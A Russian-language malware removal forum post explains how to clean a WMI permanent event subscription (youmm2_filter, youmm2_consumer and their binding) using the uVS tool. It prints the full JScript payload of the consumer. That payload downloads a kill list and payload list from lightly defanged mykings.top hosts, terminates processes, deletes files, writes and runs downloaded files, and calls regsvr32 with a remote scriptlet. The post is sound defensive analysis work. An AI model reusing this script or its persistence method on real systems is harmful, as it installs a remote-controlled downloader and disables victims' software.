
WMI Infections



At the forum forum.esetnod32.ru we resolve WMI-script infections using the program Universal Virus Sniffer (uVS). The sample below is a WMI permanent event subscription: an __EventFilter (youmm2_filter), an ActiveScriptEventConsumer (youmm2_consumer) and the __FilterToConsumerBinding that links them, all in the root\subscription namespace. Removing only the consumer is not enough — the filter and the binding must be deleted as well, and because the filter fires on a __TimerEvent with timerid "youmm2_itimer", a matching timer instruction is probably registered and should be checked and removed too.

https://forum.esetnod32.ru/forum6/topic14074/
 


 

Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\YOUMM2_CONSUMER.[YOUMM2_FILTER]
Имя файла YOUMM2_CONSUMER.[YOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске (Current status: ?VIRUS? SUSPICIOUS, in autorun)

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ YOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа (Information saved at the time the image was created)
Статус в автозапуске (Status in autorun)

Namespace \\.\root\subscription
Consumer_Name youmm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name youmm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="youmm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="youmm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="youmm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "youmm2_filter";
Query = "select * from __timerevent where timerid="youmm2_itimer"";
QueryLanguage = "wql";
};


 

 
